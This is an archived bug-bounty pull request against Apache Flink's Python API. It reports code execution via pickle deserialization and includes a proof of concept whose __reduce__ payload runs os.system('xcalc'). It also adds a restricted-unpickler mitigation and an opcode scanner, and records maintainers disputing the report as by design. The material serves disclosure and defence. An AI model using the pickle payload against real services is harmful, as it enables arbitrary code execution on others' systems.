This repository has been archived by the owner on Dec 19, 2023. It is now read-only.

Fixed Arbitrary Code Execution by pickle.load #1

Open
wants to merge 9 commits into
base: master

Conversation


@B3EF B3EF commented Jan 30, 2021

📊 Metadata *

Fix for Arbitrary Code Execution

Bounty URL: https://www.huntr.dev/bounties/1-pip-apache-flink

⚙️ Description *

Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.

💻 Technical Description *

Vulnerability description: untrusted loading of data by the pickle.load function, leading to arbitrary code execution.

🐛 Proof of Concept (POC) *

Run the exploit below:

import os
import pickle
#os.system('pip3 install apache-flink')   # install PyFlink first if it is missing
from pyflink.fn_execution import operation_utils

# Payload formation: pickle stores whatever __reduce__ returns, here
# "call os.system('xcalc')", and executes it when the bytes are unpickled.
class ArbitraryCode:
    def __reduce__(self):
        cmd = 'xcalc'
        return os.system, (cmd,)

dumps = pickle.dumps(ArbitraryCode())
# load_aggregate_function unpickles its argument (the pickle.load call this
# PR targets), so the command runs here and xcalc pops up.
operation_utils.load_aggregate_function(dumps)

(Screenshot from 2021-01-30 20-28-16; image not reproduced here.)

🔥 Proof of Fix (PoF) *

(Screenshot from 2021-01-30 22-24-42; image not reproduced here.)

👍 User Acceptance Testing (UAT)

The library has been successfully tested.
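An added example, not code from this PR, from huntr or from Apache Flink, that makes the PoC above reproducible without PyFlink and shows what a mitigation at the pickle layer looks like: the same __reduce__ payload run through plain pickle.loads, an opcode scan that lists the globals a pickle would import before anything is executed, and a pickle.Unpickler subclass that allow-lists find_class (the pattern recommended in the Python pickle documentation). The allow-list contents, the marker-file command used in place of xcalc, and the function names are illustrative assumptions. The maintainers' replies in this thread address whether such a restriction is applicable to PyFlink at all, which must import user modules it does not know in advance.

```python
import io
import os
import pickle
import pickletools
import tempfile
from collections import OrderedDict


class ArbitraryCode:
    """Same trick as the PoC: pickle records "call os.system(cmd)" and the
    unpickler performs that call. The class itself is never stored."""

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return os.system, (self.cmd,)


def build_payload(cmd):
    return pickle.dumps(ArbitraryCode(cmd))


# Opcode names that push a str onto the unpickler stack.
_STRING_OPS = ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8",
               "UNICODE", "STRING", "BINSTRING", "SHORT_BINSTRING")


def referenced_globals(data):
    """(module, name) pairs a pickle would import, found by scanning opcodes
    without executing anything. Heuristic: STACK_GLOBAL operands are taken
    from literal string pushes, so memo-referenced names are not resolved."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":           # protocols 0-3: "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":   # protocol 4+: two strings on the stack
            found.append((strings[-2], strings[-1]))
        elif op.name in _STRING_OPS:
            strings.append(arg)
    return found


def unsafe_load(data):
    """The unguarded pickle.loads the PR targets: the payload runs as a side effect."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """find_class is the only hook through which a pickle reaches importable
    code, so deny by default and allow a fixed set of (module, name) pairs."""

    ALLOWED = {                           # illustrative allow-list (assumption)
        ("collections", "OrderedDict"),
        ("builtins", "set"),
        ("builtins", "frozenset"),
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo():
    """Runs one payload through both loaders and reports what happened."""
    marker = os.path.join(tempfile.mkdtemp(), "pwned")
    # Headless stand-in for xcalc: the command leaves a file behind if it ran.
    payload = build_payload(f'echo pwned > "{marker}"')

    unsafe_load(payload)
    ran_unsafe = os.path.exists(marker)
    if ran_unsafe:
        os.remove(marker)

    blocked = False
    try:
        safe_load(payload)
    except pickle.UnpicklingError:
        blocked = True
    ran_safe = os.path.exists(marker)

    # Benign data that only needs an allow-listed global still round-trips.
    benign = safe_load(pickle.dumps(OrderedDict(a=1)))
    return {
        "imports": referenced_globals(payload),
        "ran_unsafe": ran_unsafe,
        "blocked": blocked,
        "ran_safe": ran_safe,
        "benign": dict(benign),
    }


if __name__ == "__main__":
    print(demo())
```

referenced_globals is useful as a triage step because it shows, from bytes alone, that the payload wants posix.system (nt.system on Windows) before any loader touches it; the allow-list in RestrictedUnpickler is where a project would have to enumerate every type its serialized objects legitimately need, which is exactly the difficulty with serialized user-defined functions whose modules are not known up front.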

huntr-helper pushed a commit to 418sec/huntr that referenced this pull request Jan 30, 2021
@huntr-helper (Member) commented

👋 Hello, @tillrohrmann - @B3EF has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@tillrohrmann & @B3EF - thank you for your efforts in securing the world’s open source code! 🎉


tillrohrmann commented Feb 2, 2021

Thanks for creating this fix @B3EF.

I am not entirely sure whether this is really an exploit, because Flink is designed to execute arbitrary code in a parallel fashion. Hence, it is to some extent the responsibility of the user to make sure that their code does the right things. For example, using the Java API you can also call System.exit().

Moreover, we need to be able to execute code from arbitrary Python libraries whose module names we don't know upfront.

I am also pulling in @dianfu who works on Flink's Python API for a second opinion.

Feel free to disagree.


dianfu commented Feb 3, 2021

Thanks a lot for the fix @B3EF and thanks @tillrohrmann for the ping. I agree with @tillrohrmann and also tend to think this is by design and should not be a problem.

Flink allows users to execute arbitrary code. Users can define user-defined functions in Java, Scala or Python in Flink; see [1] and [2] for more details. There are no limitations on what users can do in user-defined functions, and this is the same for all kinds of user-defined functions in Flink (I think this behavior is also shared by most projects, such as Spark, Beam, etc.).
